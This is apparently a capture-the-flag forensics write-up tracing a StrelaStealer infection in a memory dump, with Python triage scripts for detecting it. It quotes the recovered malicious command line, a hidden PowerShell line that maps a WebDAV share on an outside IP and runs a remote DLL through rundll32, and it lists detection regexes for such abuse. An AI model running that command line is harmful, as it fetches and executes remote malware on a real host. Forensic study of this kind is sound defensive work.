Forensic Investigation Report: Operation 'Reveal' — Memory Analysis

Platform: CyberDefenders
Challenge: Reveal
Category: Memory Forensics / Endpoint Analysis
Difficulty: Easy
Tools: Volatility 3, OSINT
Achievement: Proof of Completion

1. Executive Summary

A memory dump was acquired from a workstation suspected of being compromised. The investigation revealed a multi-stage attack in which a user executed a malicious loader. The loader opened a decoy document to occupy the user while silently launching a hidden PowerShell process. PowerShell mapped a WebDAV path to a remote server at 45.9.74.32:8888 and executed a DLL from that path through rundll32.exe (System Binary Proxy Execution, MITRE ATT&CK T1218.011); open-source intelligence ties the infrastructure and technique to StrelaStealer. The payload ran under the account of a local administrator, Elon.


2. Investigation Phases

Phase I: Process Enumeration & Anomaly Detection (Q1 & Q2)

Objective: Identify running processes and detect suspicious activity.

We began by analyzing the process hierarchy to understand “who launched whom.” The windows.pstree plugin is superior to a simple list because it visualizes parent-child relationships, which are critical for spotting anomalies.

Command Executed:

    python3 vol.py -f 192-Reveal.dmp windows.pstree

Findings: Scanning the output for the suspicious ten-letter process name hinted at by the challenge, we identified a powershell.exe instance whose command line stood out: it mapped a UNC path to a bare Internet IP address and then invoked rundll32.

  • Malicious Process: powershell.exe (PID: 3692)
  • Parent Process (PPID): 4120

Why it was suspicious: legitimate PowerShell instances rarely run with -windowstyle hidden, and almost never use net use to map a UNC path to a bare Internet IP address. Either alone deserves a look; together they are a strong indicator of malicious intent.


Phase II: Payload & Command Line Analysis (Q3, Q4, Q5)

Objective: Deconstruct the attack vector and malicious commands.

We isolated the command line associated with PID 3692 (the windows.cmdline plugin, filtered with --pid 3692, returns it) to understand the attacker's intent.

Extracted Command Line:

    -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry

Deconstruction:

  1. The Connection (WebDAV Abuse):

    • net use \\45.9.74.32@8888\davwwwroot\
    • net use hands the path to the WebClient service (the Windows WebDAV Mini-Redirector). The @8888 suffix is the redirector's syntax for a non-default port (@SSL would select HTTPS), and DavWWWRoot is a reserved keyword that tells it the path is the root of a WebDAV server rather than an SMB share; it is not a share the attacker created.
    • Remote endpoint: http://45.9.74.32:8888/
    • Significance: the transfer is plain HTTP, so it passes egress filtering that allows web browsing and does not depend on SMB (TCP 445), which is commonly blocked outbound.
  2. The Payload (Second Stage):

    • rundll32 ... 3435.dll,entry
    • No .exe was downloaded. rundll32 resolves the UNC path through the same WebDAV connection, so the WebClient service fetches 3435.dll over HTTP and rundll32 loads it and calls its exported function entry.
    • Malicious File Name: 3435.dll
  3. The Technique (MITRE ATT&CK T1218.011):

    • Using rundll32.exe to execute code contained in a DLL is a classic example of System Binary Proxy Execution.
    • Why: rundll32.exe is a signed Microsoft binary, so allow-listing policies that trust signed system binaries, and detections that key on unsigned executables, are more likely to let it run; the malicious logic lives in the DLL it loads. Detection should therefore focus on what rundll32 loads, in particular a DLL from a UNC path, especially one carrying a DavWWWRoot or @port component.
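
The two command-line indicators above (the WebDAV UNC form and the hidden-window/rundll32 pattern) can be turned into a small triage routine. The code below is an added example written for this writeup, not part of the original post or of Volatility. It parses the Mini-Redirector UNC syntax (\\host[@SSL][@port]\DavWWWRoot\path) into the HTTP URL the WebClient service actually requests and flags the behavioural indicators seen in PID 3692; the regexes, the indicator names and the benign baseline command line are my assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# UNC form understood by the Windows WebClient (Mini-Redirector):
#   \\host[@SSL][@port]\DavWWWRoot\path
# "@SSL" selects HTTPS, "@port" a non-default port, and "DavWWWRoot" marks the
# path as the root of a WebDAV server rather than an SMB share.
UNC_RE = re.compile(
    r"\\\\(?P<host>[A-Za-z0-9.\-]+)(?P<ssl>@SSL)?(?:@(?P<port>\d+))?"
    r"\\(?:davwwwroot)\\(?P<path>[^\s;,]*)",
    re.IGNORECASE,
)


@dataclass
class WebDavRef:
    host: str
    port: int
    tls: bool
    path: str  # forward-slash form of the remote path, "" for the server root

    def url(self) -> str:
        scheme = "https" if self.tls else "http"
        return f"{scheme}://{self.host}:{self.port}/{self.path}"


def parse_webdav_refs(cmdline: str) -> List[WebDavRef]:
    """Extract every WebDAV UNC reference from a command line."""
    refs = []
    for m in UNC_RE.finditer(cmdline):
        tls = m.group("ssl") is not None
        port = int(m.group("port")) if m.group("port") else (443 if tls else 80)
        refs.append(WebDavRef(m.group("host"), port, tls,
                              m.group("path").replace("\\", "/")))
    return refs


# Behavioural indicators taken from the Reveal command line (names are mine).
# Each is a regex over the raw command line, so argument order does not matter.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("net_use_unc", re.compile(r"\bnet\s+use\s+\\\\", re.I)),
    ("rundll32_remote_dll", re.compile(r"\brundll32(?:\.exe)?\s+\\\\\S+\.dll\b", re.I)),
    ("ip_literal_unc", re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}(?:@\w+)*\\", re.I)),
]


def triage_cmdline(cmdline: str) -> Dict[str, list]:
    """Return matched indicators plus the IOCs (hosts, URLs, DLL names) to pivot on."""
    refs = parse_webdav_refs(cmdline)
    return {
        "indicators": [name for name, rx in INDICATORS if rx.search(cmdline)],
        "hosts": sorted({r.host for r in refs}),
        "urls": [r.url() for r in refs],
        "dlls": [r.path.rsplit("/", 1)[-1] for r in refs if r.path.lower().endswith(".dll")],
    }


# The command line recovered from PID 3692 in the writeup.
REVEAL_CMDLINE = (r"-windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; "
                  r"rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry")

# Constructed benign baseline (not from the dump) to show the rules stay quiet on it.
BENIGN_CMDLINE = r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"

if __name__ == "__main__":
    for label, cmd in (("reveal", REVEAL_CMDLINE), ("benign", BENIGN_CMDLINE)):
        print(label, triage_cmdline(cmd))
```

Run it as a script, or feed it each Cmd column from windows.cmdline output; the returned urls are what a proxy or NetFlow search should be pivoted on, since the WebDAV client never speaks SMB to 45.9.74.32.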

Phase III: Attribution & User Context (Q6)

Objective: Determine the compromised user account and privilege level.

To assess the impact, we needed to know which user owns the malicious process. In Windows, this is tracked via Security Identifiers (SIDs).

Command Executed:

    python3 vol.py -f 192-Reveal.dmp windows.getsids --pid 3692

Findings:

  • User SID: S-1-5-21-...-1001 mapped to the username Elon.
  • Group SIDs: The output showed membership in S-1-5-32-544 (Administrators).

Conclusion: The compromised user is Elon, a member of the local Administrators group, so the payload ran with that account's rights. One caveat: windows.getsids lists the SIDs in the process token but not their attributes, and on a UAC-enabled host the Administrators SID also appears in the filtered, medium-integrity token that non-elevated processes receive. Check the integrity level and enabled privileges of PID 3692 (for example with windows.privileges) before concluding that the payload ran elevated; either way, the account's credentials and everything it can reach must be treated as compromised.


Phase IV: Threat Intelligence (Q7)

Objective: Identify the specific malware family.

We pivoted from internal forensics to external intelligence. Searching for the unique Indicators of Compromise (IOCs) gathered:

  • IP: 45.9.74.32
  • Behavior: WebDAV (davwwwroot) + Rundll32 + DLL execution

Verdict: Public sandbox reports (ANY.RUN) link these specific IOCs to StrelaStealer. This malware family is known for stealing email credentials (Outlook/Thunderbird) using polyglot files and WebDAV delivery methods.


Phase V: The “Patient Zero” Discovery

Objective: Identify the infection vector (how the malware started).

Analysis of the process lineage (via pslist and psscan) revealed that both powershell.exe (PID 3692) and wordpad.exe (PID 9112) were spawned by the same parent, PID 4120.

PID     PPID    Name             CreateTime
9112    4120    wordpad.exe      07:00:03
3692    4120    powershell.exe   07:00:03

Neither pslist nor psscan returned an entry for PID 4120. Because psscan carves _EPROCESS structures from raw memory, and so also finds terminated processes whose structures have not yet been reused, its silence means the parent exited early enough for its memory to be reclaimed. This is consistent with a loader that launches its payload and exits immediately to minimise its footprint. A missing parent alone is not proof of malice (explorer.exe's parent, userinit.exe, normally exits too); what matters is the pairing with the two children below.

The Decoy Tactic: The now-vanished parent process (PID 4120) launched two children at the exact same second:

  1. The Bait: wordpad.exe opened a document to distract the user.
  2. The Hook: powershell.exe launched the malware in the background.

This is consistent with the user double-clicking a malicious file (for example a shortcut or script disguised as a document) that launched both children. The launcher itself was not recovered from memory, so its exact form remains unconfirmed.
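
The decoy pattern above is mechanical enough to hunt for across a whole process list: a parent that no longer exists, with two or more children created within the same second, one of them a document viewer and another a script host or LOLBin. The code below is an added example for this writeup, not code from the original post or from Volatility. It parses a tab-separated process table in the shape of Volatility 3's default renderer (trimmed to four columns) and reports such pairs; the sample rows other than 9112 and 3692, the date, and the decoy/hook application lists are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set

# Constructed sample in the tab-separated shape of Volatility 3's default
# renderer, trimmed to four columns. The 9112/4120 and 3692/4120 rows mirror
# the writeup; every other row (and the date) is invented filler.
SAMPLE_PSLIST = """\
PID\tPPID\tImageFileName\tCreateTime
4\t0\tSystem\t2024-06-14 06:40:01
620\t4\tsmss.exe\t2024-06-14 06:40:02
1012\t900\texplorer.exe\t2024-06-14 06:41:10
5120\t1012\tchrome.exe\t2024-06-14 06:55:30
5121\t1012\tchrome.exe\t2024-06-14 06:55:30
9112\t4120\twordpad.exe\t2024-06-14 07:00:03
3692\t4120\tpowershell.exe\t2024-06-14 07:00:03
"""

# Assumed lists: what a loader opens as bait, and what it uses as the hook.
DECOY_APPS = {"wordpad.exe", "winword.exe", "notepad.exe", "acrord32.exe", "excel.exe"}
HOOK_APPS = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "mshta.exe",
             "wscript.exe", "cscript.exe"}


def parse_pslist(text: str) -> List[dict]:
    """Parse a header-led, tab-separated process table into row dicts."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split("\t")
    rows = []
    for ln in lines[1:]:
        f = dict(zip(header, ln.split("\t")))
        rows.append({
            "pid": int(f["PID"]),
            "ppid": int(f["PPID"]),
            "name": f["ImageFileName"],
            "created": datetime.strptime(f["CreateTime"], "%Y-%m-%d %H:%M:%S"),
        })
    return rows


def missing_parents(rows: List[dict]) -> Set[int]:
    """PPIDs that no listed process carries (PPID 0 is the root and is ignored)."""
    pids = {r["pid"] for r in rows}
    return {r["ppid"] for r in rows if r["ppid"] and r["ppid"] not in pids}


def sibling_bursts(rows: List[dict], window_seconds: int = 1) -> Dict[int, List[dict]]:
    """Children of one parent created within window_seconds of each other."""
    by_parent: Dict[int, List[dict]] = defaultdict(list)
    for r in rows:
        by_parent[r["ppid"]].append(r)
    bursts = {}
    for ppid, kids in by_parent.items():
        kids.sort(key=lambda r: r["created"])
        for i, first in enumerate(kids):
            group = [k for k in kids[i:]
                     if (k["created"] - first["created"]).total_seconds() <= window_seconds]
            if len(group) >= 2:
                bursts[ppid] = group
                break
    return bursts


def decoy_hook_pairs(rows: List[dict], window_seconds: int = 1) -> List[dict]:
    """Bursts that pair a document viewer (bait) with a script host or LOLBin (hook)."""
    gone = missing_parents(rows)
    findings = []
    for ppid, group in sibling_bursts(rows, window_seconds).items():
        names = {r["name"].lower() for r in group}
        decoys, hooks = sorted(names & DECOY_APPS), sorted(names & HOOK_APPS)
        if decoys and hooks:
            findings.append({"ppid": ppid, "parent_missing": ppid in gone,
                             "decoy": decoys, "hook": hooks,
                             "children": sorted(r["pid"] for r in group)})
    return findings


if __name__ == "__main__":
    rows = parse_pslist(SAMPLE_PSLIST)
    print("missing parents:", sorted(missing_parents(rows)))
    for f in decoy_hook_pairs(rows):
        print("decoy/hook pair:", f)
```

On the sample, missing_parents reports both 900 (explorer.exe's long-gone userinit.exe, a benign orphan) and 4120, and the two chrome.exe tabs form a burst too; only 4120 satisfies the full decoy-plus-hook rule, which is why the three signals are combined rather than alerted on individually. Volatility timestamps are one-second granular, so a window of 1 is the tightest useful setting.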


3. Incident Timeline

Based on the CreateTime timestamps and process lineage, we reconstructed the flow of the attack. Only process creation times are present in the dump; the C2 connection and payload execution are ordered by the command line and carry the PowerShell creation time, not an independent timestamp.

| Time (UTC) | Event Type | Description |
| --- | --- | --- |
| 07:00:03 | Initial Execution | The user "Elon" executes a malicious launcher (PID 4120), which is no longer resident in memory. |
| 07:00:03 | Decoy Launch | The launcher spawns wordpad.exe (PID 9112) to display a decoy document and lower user suspicion. |
| 07:00:03 | Malware Launch | Simultaneously, the launcher spawns powershell.exe (PID 3692) with -windowstyle hidden. |
| 07:00:03 (inferred) | C2 Connection | PowerShell runs net use, which makes the WebClient service connect over HTTP to 45.9.74.32:8888 (DavWWWRoot path). |
| 07:00:03 (inferred) | Payload Execution | PowerShell runs rundll32.exe, which loads 3435.dll from the remote WebDAV path and calls its export entry (StrelaStealer). |
| Post-infection | Data Exfiltration (inferred) | StrelaStealer harvests credentials from local mail clients and sends them to the attacker. |

4. Conclusion

The forensic analysis confirms a successful infection of the workstation by StrelaStealer. The attack leveraged built-in Windows tools (PowerShell, rundll32.exe, net use and the WebClient service) to evade detection and used a social engineering decoy to trick the administrator "Elon". Immediate remediation is required: isolate the host, reset Elon's password and every mail credential stored on the workstation (StrelaStealer targets Outlook and Thunderbird), block 45.9.74.32 at the network egress, and disable the WebClient service on hosts that do not need WebDAV so this delivery path is closed.


Analysis Date: December 13, 2025
Analyst: El OMARI Zakaria

This post is licensed under CC BY 4.0 by the author.